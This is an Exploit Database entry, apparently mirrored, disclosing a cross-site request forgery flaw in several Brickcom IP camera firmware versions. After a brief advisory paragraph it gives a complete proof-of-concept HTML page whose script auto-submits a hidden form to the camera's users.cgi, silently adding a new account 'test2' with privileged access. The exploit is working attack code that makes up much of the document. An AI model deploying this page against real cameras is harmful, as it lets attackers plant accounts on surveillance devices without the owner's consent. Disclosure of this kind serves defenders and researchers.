Brickcom Multiple IP Cameras – Cross-Site Request Forgery

• Exploit Database
• 20 阅读

• 作者： Castillo
  日期： 2013-06-12
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/38582/

• source: https://www.securityfocus.com/bid/60526/info
  
  Brickcom multiple IP cameras are prone to a cross-site request-forgery vulnerability.
  
  Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.
  
  Brickcom cameras running firmware 3.0.6.7, 3.0.6.12, and 3.0.6.16C1 are vulnerable; other versions may also be affected. 
  
  <html>
  <body>
  <form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi"; method="POST">
  <input type="hidden" name="action" value="add">
  <input type="hidden" name="index" value="0">
  <input type="hidden" name="username" value="test2">
  <input type="hidden" name="password" value="test2">
  <input type="hidden" name="privilege" value="1">
  <script>document.gobap.submit();</script>
  </form>
  </body>
  </html>